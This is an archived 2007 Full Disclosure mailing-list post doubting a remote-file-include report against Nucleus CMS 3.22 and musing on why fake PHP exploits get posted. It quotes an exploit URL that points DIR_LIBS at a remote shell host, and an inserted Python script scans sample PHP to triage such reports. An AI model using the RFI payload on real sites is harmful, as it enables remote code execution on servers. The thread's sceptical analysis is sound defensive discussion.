Full Disclosure mailing list archives
Re: nucleus 3.22 >> RFI
From: "Ron Superior" <rsuperior () gmail com>
Date: Mon, 7 May 2007 14:12:49 -0400
Hi folks,

Some months back I seem to remember people hypothesizing as to the real purpose behind some of these particularly lame fake PHP exploits. You know the ones I mean; they're mostly remote file includes, they often are decorated with some simple ASCII art, and the "thanks" and "greetz" sections are always loaded with names that suggest Turkish or other Middle Eastern origin.

The two most interesting suggestions that I recall were:

1) Somebody wanted to pump up the lists with PHP exploits so they could claim later that some large number X of PHP vulnerabilities had been posted to FD since some date.

2) Covert communication, or that the "exploits" were really secret messages between t3rr0ri$ts or something.

I'm sure there exists a motive beyond just spamming us to be annoying. Anyone have any new ideas, or good arguments for either of the above two ideas?

Ron

Guasconi Vincent wrote:
> On 5/6/07, security curmudgeon <jericho () attrition org> wrote:
>
> : VENDOR : http://nucleuscms.org/
> : BY : s3rv3r_hack3r (hackerz.ir admin)
> : bug:
> : nucleus3.22/nucleus/plugins/skinfiles/index.php
> :
> :     include($DIR_LIBS . 'PLUGINADMIN.php');
> :
> : Exploit:
> : http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
>
> I haven't examined the source code to this, but on June 16, 2006, gamr-14 () hotmail com disclosed RFI vulnerabilities [1] in four Nucleus scripts, all with the DIR_LIBS variable as the injection point. This was subsequently proven to be a false report as the variable was previously set and could not be manipulated by an attacker.
>
> Have you actually tested this, or is this based on a quick grep of the source code?

They're like bots now. They didn't hear you, and you can't stop them. Try a spam rule.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
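The thread's point that the Nucleus report was false because DIR_LIBS was assigned before the include() is exactly what a quick grep for include($VAR misses. The Python triage script below is an added example, not code from the thread or from Nucleus: for each include()/require() driven by a variable it reports whether that variable is assigned earlier in the same file, may come from an earlier literal include such as a config file, or is never set in the file. The PHP snippets it scans are constructed, and a 'maybe' result means read the included config, while even 'assigned' only says the report's injection point is wrong, not that the file is otherwise safe.

```python
import re

# Constructed PHP samples (not the real Nucleus source). SAFE assigns the
# include variable locally; CONFIG pulls it from an included config file;
# UNSAFE never assigns it, so with register_globals=On a request parameter
# could supply it.
SAFE_SAMPLE = """<?php
$DIR_LIBS = '/var/www/nucleus/libs/';
include($DIR_LIBS . 'PLUGINADMIN.php');
"""
CONFIG_SAMPLE = """<?php
require_once('../../config.php');
include($DIR_LIBS . 'PLUGINADMIN.php');
"""
UNSAFE_SAMPLE = """<?php
include($DIR_LIBS . 'PLUGINADMIN.php');
"""

# include/require whose first operand is a plain variable: include($X . '...')
VAR_INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)')
# include/require of a string literal, which may define variables for this file
LIT_INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*[\'"]')
# plain assignment $X = ... (the lookahead rejects the == comparison)
ASSIGN_RE = re.compile(r'\$(\w+)\s*=(?!=)')

def triage_includes(php_source):
    """Return (line_no, var_name, status) for each variable-driven include,
    where status is 'assigned' (set earlier in this file),
    'maybe_defined_by_include' (a literal include precedes it) or
    'unassigned' (nothing in this file sets it: test it for real)."""
    findings = []
    for m in VAR_INCLUDE_RE.finditer(php_source):
        var, end = m.group(1), m.start()
        line_no = php_source.count('\n', 0, end) + 1
        if any(a.group(1) == var for a in ASSIGN_RE.finditer(php_source, 0, end)):
            status = 'assigned'
        elif LIT_INCLUDE_RE.search(php_source, 0, end):
            status = 'maybe_defined_by_include'
        else:
            status = 'unassigned'
        findings.append((line_no, var, status))
    return findings

def looks_like_rfi(php_source):
    """True only for includes that nothing in the file assigns; an earlier
    assignment is exactly what made the Nucleus DIR_LIBS report false."""
    return any(s == 'unassigned' for _, _, s in triage_includes(php_source))
```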
Current thread:
- Re: nucleus 3.22 >> RFI Guasconi Vincent (May 07)
- <Possible follow-ups>
- Re: nucleus 3.22 >> RFI Ron Superior (May 07)
- Re: nucleus 3.22 >> RFI evilrabbi (May 08)